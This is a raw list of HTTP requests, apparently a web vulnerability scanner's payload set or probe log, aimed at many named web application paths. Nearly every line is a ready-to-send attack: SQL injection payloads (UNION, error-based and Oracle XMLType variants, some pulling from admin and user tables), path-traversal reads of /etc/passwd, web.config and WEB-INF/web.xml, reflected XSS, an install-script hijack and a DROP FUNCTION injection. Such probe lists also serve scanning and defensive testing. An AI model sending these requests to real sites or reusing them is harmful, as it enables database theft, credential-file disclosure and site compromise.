GET /index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
GET /zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
GET /prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
GET /prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
GET /truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
GET /bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/webissue.asp
GET /article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
GET /bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/nowwebissue.asp
GET /bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/prewebissue.asp
POST /epstar/servlet/RaqFileServer?action=save&fileName=test.txt
GET /epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
GET /www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
HEAD /body/Function/download.asp?filepath=../download.asp&filename=download
GET /news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
GET /install/step4.aspx
GET /admin/Role/Role_List.aspx
GET /sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
POST /admin/operupload.asp
POST /member/findAddressById.json
POST /member/zoneNm.json
GET /main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
HEAD /i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
GET /api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
POST /search.php
GET /opac/index.jsp?page=../web-inf/web.xml
HEAD /datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
GET /datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
GET /account.t?op=showAccountList
GET /oa_server/App_Pages/App_page/News_add.aspx
POST /truexxgk/app/YsqgkController/smallQuery?type=1
POST /truexxgk/app/YsqgkController/smallQuery?type=1
GET /store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /detail.asp?id=-306/**/And/**/1=char(106)--&&t=
GET /content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /UploadHandler.ashx
GET /index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
GET /class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
POST /admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
POST /post.php?act=phpok&id=12
POST /weixin/index.php?m=index&c=index
POST /work_flow/formOptJSPUpload.jsp?flag=1
POST /work_flow/formStartJSPUpload.jsp?flag=1
POST /admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
POST /public/editor/tpsc1.jsp?flag=sc
GET /outImg?imgPath=c:/boot.ini
GET /outImg?imgPath=/etc/passwd
POST /gsgl.asp?stype=
GET /common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /piw/Member/UploadMemberAttach.jsp
GET /piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
GET /piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
GET /piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
HEAD /cardload.jsp?filename=../etc/passwd&maininfo_id=-12
GET /systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
GET /show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
GET /FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
GET /Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
GET /news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
GET /OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
GET /Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
GET /wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
GET /answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
POST /member.php?act=updateinfo
POST /site56/LmsOrder/trackOrder.jspx
GET /house/ProcManage/WebHouse/HousePic.aspx
GET /CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
GET /CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
HEAD /_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
GET /FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
POST /loginverify.asp
POST /newssearch.cfm
GET /mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
GET /news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
HEAD /down.aspx?Url=../web.config
HEAD /showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
GET /sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
GET /opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
GET /getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
GET /getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
GET /MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
GET /install/install.php.lock?step=2
GET /cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
GET /getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
HEAD /web.config.file.aspx
GET /wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
POST /information/changeState.asp
POST /MessageList.asp?action=search
POST /bangong/GroupInforDo.asp
POST /bangong/ShortCutInforDo.asp
HEAD /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
GET /shownews.aspx?newsno=-1'%20and%201=char(106)%20--
GET /nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
POST /ratercp.php?action=savepassword
GET /admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
POST /admincp.php?action=constructionresults&todo=del
POST /admincp.php?action=declarepublish&todo=del
GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
GET /index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /index.php?action=search&todo=site
GET /index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
POST /include/upload.inc.php
POST /admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
POST /admincp.php?action=vote&todo=savevote
GET /admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
POST /admincp.php?action=/../teach/sitebook&id=1
GET /seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
GET /complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
GET /list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
POST /index_communicate.php
GET /file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
GET /pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
GET /pub/search/default.asp?id=-1/**/and/**/1=char(106)--
GET /pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
GET /index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
HEAD /DownLoad.aspx?mu=../&fn=web.config&newname=web.config
GET /faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
GET /NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
GET /WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
POST /pt/edu/stuTransfer.aspx
GET /NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
GET /news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
GET /news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
GET /allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /download2.aspx?fn=../web.config
HEAD /DownLoad.aspx?Accessory=../index.aspx
POST /mod/news/qianshoucount.php
POST /mod/card/quest.php?op=get_m
POST /mod/home/quest.php?op=get_group_list
GET /NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
GET /NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
GET /js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
HEAD /ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
GET /news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
GET /ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
GET /jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
POST /scrp/book.cfm?sKeyword=1&sFieldName=bname
GET /main/
GET /asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
GET /getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
GET /install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
GET /module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
GET /myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
POST /Logon?action=logon
GET /UserSecurityController.do?method=getPassword&step=2&userName=admin
GET /webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
HEAD /common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
GET /OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
GET /showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
POST /general/crm/apps/crm/include/import/export.php
GET /Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
GET /Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
HEAD /admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
GET /cms/conf/system.xml
POST /erp/reportmanage/taskreport/lljinduadd.aspx
POST /oa/erp/SalePlan/YearPlanAdd.aspx
GET /oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
GET /oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
GET /oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
HEAD /downTemp.aspx?type=downDb&fileName=../web.config
GET /showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
GET /showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
GET /cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
GET /datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
GET /user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
GET /admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
GET /admin/manage.jsp
GET /shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
GET /content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
POST /mod/shop/quest/ajax.php?op=auction_buy
GET /wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
